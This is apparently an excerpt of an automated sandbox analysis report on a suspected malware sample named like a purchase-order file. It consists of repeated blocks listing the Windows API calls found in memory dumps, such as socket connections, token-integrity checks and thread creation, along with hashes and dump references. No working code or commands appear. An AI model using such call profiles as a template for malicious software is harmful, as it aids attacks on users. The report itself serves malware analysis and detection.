                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                                                      • Opcode ID: d17ea4044e2045b9c16e98e0df8e21c289d5939ccdd835b3e45b18eb1401e770
                                                                                                                                                                                                      • Instruction ID: e5f01e0ccbb0feccb883e1297f79fe71a552ab19b66adbfd7133fe0b7bbb2f95
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d17ea4044e2045b9c16e98e0df8e21c289d5939ccdd835b3e45b18eb1401e770
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5731AE7190022DEBDF04CF68DD4DB9E7BB5EB08319F10462AFA21AA2D1C3B49954CB95
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 004050E6: _wcsncpy.LIBCMT ref: 004050FA
                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?,004460C3), ref: 00446369
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,004460C3), ref: 00446374
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004460C3), ref: 00446388
                                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 004463AA
                                                                                                                                                                                                        • Part of subcall function 00446318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004460C3), ref: 004463E0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3633006590-0
                                                                                                                                                                                                      • Opcode ID: 75aa4d998ddada8572ea712b4258d5f130d90a0f127b447a506129f3f3888f0c
                                                                                                                                                                                                      • Instruction ID: e2e5c400610b8dad56117f9b5beb12c84386859fb76420c5d936f92795e9889b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75aa4d998ddada8572ea712b4258d5f130d90a0f127b447a506129f3f3888f0c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B212630A042145AFB24AE74AC42FEF23ACAF06360F11047FF805C31C1EB6899858A5E
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0045A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E
                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00458BD3
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458BE2
                                                                                                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00458BFE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3701255441-0
                                                                                                                                                                                                      • Opcode ID: 822bd67af5b21315d4a58d27a51d58b89f2d7ba38396fa916d0a561f55ec1a63
                                                                                                                                                                                                      • Instruction ID: abb2c2ea28d5de88bdee0dc417e74f9f20a9303d66739d36d785107e4a3282d2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 822bd67af5b21315d4a58d27a51d58b89f2d7ba38396fa916d0a561f55ec1a63
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C21DE316002009FCB10AF28C885B7E73A9AF48714F04446EF902AB3D2CF78AC058B69
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00458441
                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00458458
                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00458494
                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 004584A0
                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 004584DB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                                                      • Opcode ID: 932ca161dc75b4b717c601e34a63d21e2026fc438652b47232b146da7129521a
                                                                                                                                                                                                      • Instruction ID: 8a1256e0aecdf14aa6c4f4beab4c2806aa620a91b813a528773de1c84d1aad7c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 932ca161dc75b4b717c601e34a63d21e2026fc438652b47232b146da7129521a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E21A735A00204AFD700EFA5C945A5EB7E5EF48305F04887DEC49A7252DF74EC04CB54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041AFF2
                                                                                                                                                                                                      • BeginPath.GDI32(?), ref: 0041B009
                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B033
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3225163088-0
                                                                                                                                                                                                      • Opcode ID: 7c4a71da7bb7c6b92ed87e99b55654c99fda81b73bae783c331b6063b13b5e52
                                                                                                                                                                                                      • Instruction ID: a68afc14fff29162dc6faf8435a876086fec7fed57c06213cce97e3b8c98d3b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c4a71da7bb7c6b92ed87e99b55654c99fda81b73bae783c331b6063b13b5e52
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8216070901305AFDB109F55EC88BDE7B68FB16355F14432BE425962B1C37488968B99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 004221A9
                                                                                                                                                                                                      • CreateThread.KERNEL32(?,?,004222DF,00000000,?,?), ref: 004221ED
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004221F7
                                                                                                                                                                                                      • _free.LIBCMT ref: 00422200
                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0042220B
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2664167353-0
                                                                                                                                                                                                      • Opcode ID: fe78e4b33934f2f665193501f35f76f7858f28a7d68122209891d7eb0561a6b8
                                                                                                                                                                                                      • Instruction ID: c22bb6fff56d961d5c9c29188316b6b7028ddab09764e3de592cdea5f7742925
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe78e4b33934f2f665193501f35f76f7858f28a7d68122209891d7eb0561a6b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79112932304326BF9B10AFA6BD41D6B3798EF00734750042FF91497192DBBA981187A8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000008,?,?,00AF15D8,00AF3CBB,?,00AF1D2A,?,?,00000000), ref: 00AF18E4
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF1919
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF1940
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00AF1D2A,?,?,00000000), ref: 00AF194D
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00AF1D2A,?,?,00000000), ref: 00AF1956
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                      • Opcode ID: 38a4149a53f321f512d9ae6ad437c2d61e82cc627f9c69bfbf2bb1d6c7cbd1ca
                                                                                                                                                                                                      • Instruction ID: d61e0d453e11edba123859c48f7798985bd1dc4ac45245355b21826f96155b17
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38a4149a53f321f512d9ae6ad437c2d61e82cc627f9c69bfbf2bb1d6c7cbd1ca
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B01F937200609EBD321B7F46DD5ABB266DDBD13787210125F705E3252FEA58C428191
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                                                      • Opcode ID: 1105c51a95b9c4985460d9023d3962ffaa69d09a53960c860975f241e157bdbc
                                                                                                                                                                                                      • Instruction ID: 9a6f70c041a44a4f9a827da56d6e218984a148510de144741497beb3d206d3d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1105c51a95b9c4985460d9023d3962ffaa69d09a53960c860975f241e157bdbc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4016970641204BFDB115FA9EC8CDAB3BACFF8A354B10182EF955D32A0DA718C50CB68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0043AA79
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0043AA83
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0043AA92
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0043AA99
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0043AAAF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                      • Opcode ID: 005e3d2c3a84d1d8d797b66e4ccb948516923a2946e7af749364c39d3cf5c40b
                                                                                                                                                                                                      • Instruction ID: 974b26daf64f8dbf61396155943fd57f6b72a90fe55d440549507bfb75707d11
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 005e3d2c3a84d1d8d797b66e4ccb948516923a2946e7af749364c39d3cf5c40b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91F0AF322412046FEB102FA4AC8CE6B3BACFF4E754F10082EF941C7290DB619C15CB65
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0043AADA
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAE4
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAF3
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAFA
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AB10
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                      • Opcode ID: b3c430549ea03a9ae663836329f0cbd350e6d7a8f5d55abe0fc1a4013e99c131
                                                                                                                                                                                                      • Instruction ID: 146aa33a93239cb99623a1635ed7780d23d82dc7e0fdc4ba1386104819eb8aef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3c430549ea03a9ae663836329f0cbd350e6d7a8f5d55abe0fc1a4013e99c131
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3F04F71641208AFEB110FA4EC8CE6B7B6DFF4A754F10053EFA51C7290DB65AC118B65
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF3189
                                                                                                                                                                                                        • Part of subcall function 00AF2096: HeapFree.KERNEL32(00000000,00000000,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?), ref: 00AF20AC
                                                                                                                                                                                                        • Part of subcall function 00AF2096: GetLastError.KERNEL32(?,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?,?), ref: 00AF20BE
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF319B
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF31AD
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF31BF
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF31D1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                      • Opcode ID: 91224d0f344701084b14282d895154bd5e4b87700655219eb368bd5b32300d0a
                                                                                                                                                                                                      • Instruction ID: 69a04334d1a4ce231e76dd42fddb64d7955c077bf2086db72cca8796ed0dff89
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91224d0f344701084b14282d895154bd5e4b87700655219eb368bd5b32300d0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBF0FF33554208AB8F34EBA8E9C5D7A77E9BA047117944909F649D7701CE70FD808A68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0043EC94
                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0043ECAB
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 0043ECC3
                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 0043ECDF
                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0043ECF9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                      • Opcode ID: a4357b5e30fb9fe67f4be092913bd6825b4be062f9c32e96e3c3d0623023620a
                                                                                                                                                                                                      • Instruction ID: 98597da713e12d6dfb059cec58a8c53e20aa62e351f3c557d6efc3328c67b8a1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4357b5e30fb9fe67f4be092913bd6825b4be062f9c32e96e3c3d0623023620a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28018630901704ABEB245B51DE4EB9A7778FF04705F00196EB543714E1DBF4A945CB48
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 0041B0BA
                                                                                                                                                                                                      • StrokeAndFillPath.GDI32(?,?,0047E680,00000000,?,?,?), ref: 0041B0D6
                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B0E9
                                                                                                                                                                                                      • DeleteObject.GDI32 ref: 0041B0FC
                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 0041B117
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
